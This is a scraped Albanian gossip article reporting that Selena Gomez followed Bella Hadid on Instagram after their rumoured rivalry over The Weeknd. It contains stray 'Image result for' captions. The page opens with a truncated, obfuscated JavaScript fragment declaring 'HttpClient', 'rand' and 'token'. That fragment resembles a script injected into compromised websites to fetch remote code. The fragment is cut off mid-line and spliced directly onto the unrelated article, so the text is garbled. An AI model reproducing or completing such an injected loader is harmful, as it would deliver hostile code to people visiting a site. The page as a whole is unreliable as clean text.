;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pasi ia mori të dashurin, Selena Gomez ndjek në Instagram Bella Hadid

By

Selena Gomez po e lë dramën në të kaluarën ndërsa hap në një kapitull të ri në karrierën dhe jetën e saj personale.

Pasi dyshohej për një konflikt mes saj dhe modeles Bella Hadid për shkak se të dyja kishin pasur lidhje me këngëtarin The Weeknd, duket sikur Selena është e gatshme të bëjë paqe me atë pjesë të së kaluarës së saj, teksa ajo vendosi ta ndjek modelen 23-vjeçare në Instagram.

Image result for selena and weeknd and bella and the weekend

Në rast se e keni harruar: Selena filloi të takohej me këngëtarin kanadez në vitin 2017. Por përpara se të fillonte historia e tyre e dashurisë, Bella dhe The Weekend ndezën thashethemet për romantizëm në maj 2015, pasi u vunë re në Coachella po atë vit .

Sidoqoftë, në fund të vitit 2016 u raportua që çifti ishte ndarë. Pas kësaj, The Weeknd u vërejt duke u puthur me Selenën vitin e ardhshëm dhe kjo nuk u prit shumë mirë nga Bella pasi ajo shpejt e hoqi Gomez nga Instagram vetëm disa orë pasi ky lajm kishte marrë faqet e para të tabloidëve.

Image result for selena and weeknd kissing first pic

Që nga ajo kohë, The Weeknd është ndarë dhe ribashkuar shumë here me të dyja por duket se Selena është e gatshme t’i vendosë të gjitha pas saj.

Ndërsa Bella dhe Selena nuk ishin domosdoshmërisht miqtë më të mirë, të dyja ndajnë miq dhe njohje të ndërsjellë. Në vitin 2015, të dyja u fotografuan së bashku duke qëndruar jashtë me një grup miqsh.

Por kur marrëdhëniet e Selenës dhe The Weeknd dolën publike, dukej sikur e gjithë miqësia mbaroi.

Image result for selena and bella

Edhe pse sipas Elle, Bella ende nuk e ka ndjekur këngëtaren ne jemi të lumtur të shohim që këto dy gra të suksesshme po punojnë drejt lënies së dramës së panevojshme në të kaluarën.

Burimi: Elle.com

Artikuj të ngjashëm